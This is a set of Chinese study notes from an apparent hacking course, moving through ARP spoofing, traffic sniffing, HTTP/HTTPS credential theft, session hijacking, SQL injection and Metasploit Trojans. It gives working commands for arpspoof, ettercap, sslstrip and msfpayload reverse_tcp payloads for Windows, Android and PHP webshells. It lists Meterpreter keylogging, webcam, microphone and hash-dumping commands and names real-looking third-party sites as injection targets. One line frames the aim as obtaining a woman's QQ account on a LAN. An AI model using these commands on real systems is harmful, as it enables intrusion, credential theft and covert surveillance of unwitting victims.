windows 雨滴 美化
局域网 断网攻击  arp攻击 arpspoof -i  网卡 -t 目标ip 网关
                查看局域网当中的ip   Fping -asg  网段

获取内网妹子的qq

arp欺骗   ：  目标的IP流量经过我的网卡，从网关出去
arp断网 ：没有从网关出去

进行IP流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 写命令，不会有回显
可以ping通
此时：arp成功欺骗，不会出现断网现象

场景回顾：
arp欺骗成功  ==

driftnet     --> 获取本机网卡的图片

目标 --》 我的网卡 --》网关
 
 看我的网卡的图片信息

 Driftnet  -i  eth0

 第八课 http账号密码获取


  开启IP转发
  1、echo 1 > /proc/sys/net/ipv4/ip_forward

  2、arpspoof  欺骗

  3、ettercap -Tq -i eth0

  -Tq  文本模式   

  第九课 https账号密码获取


  配置一下


  同上

  3、sslstrip -a -f -  》 https的链接还原为http


第十课 会话劫持
arpspoof  
wireshark 抓包
ferret  重新生成抓包后的文件
hamster  重放流量


sqlmap
asp http://www.czypjx.com/News_show.asp?id=113
asp  www.wisefund.com.cn  cookie 注入

php www.ggec.com.cn 注入

第十五课
msfpayload 生成木马

use exploit  windows/meterpreter/reverse_tcp
使用这个shellcode

第十六课

如何使用木马：
help

木马常用功能：
background 后台运行
session -l 列出所有会话
session -i id 进入会话

注入进程 ： 木马随时有可能被结束掉的
ps  得到我们要注入的PID进程
Migtrate    xxx  注入  

   2036  2004  exlore.exe 桌面进程
migrate  2036

run  vnc  开启远程桌面

文件管理功能 ：
download     下载文件
edit          编辑文件
cat           查看文件
mkdir         创建文件夹
mv            移动文件
rm            删除文件
upload        上传文件
rmdir          删除文件夹

网络及文件操作
arp      看ARP缓冲表
ifconfig    Ip地址
netstat      查看端口连接

kill       结束进程
ps          查看进程
reboot      重启电脑
reg           修改注册表
shell        获取shell
shutdown      关闭电脑
sysinfo      获取电脑信息


用户操作和其它功能讲解
enumdesktops      --用户登录数
keyscan_dump      键盘记录下载--下载
keyscan_start       -----开始
keyscan_stop        -----停止

uncil   disenable/enable keyboard
uncil   disenable mounse？
      获取键盘鼠标控制权

record_mic     -h  音频录制
webcam_chat          查看摄像头接口
webcam_list           摄像头列表
webcam_stream        摄像头视频获取
getsystem          获取高权限
hashdump     获取hash密文

第十八课 msf之安卓渗透

msfpayload  android/meterpreter/reverse_tcp
             使用这个shellcode

第十九课  msf 蓝屏攻击
 DDOS
 ms12_202 然并卵吧

 第二十课 msf之生成webshell以及应用
   1、在msf中生成一个php脚本  
   msfpayload  php/meterpreter/reverse_tcp LHOST=ip  R > web.php
   2、同上
   execute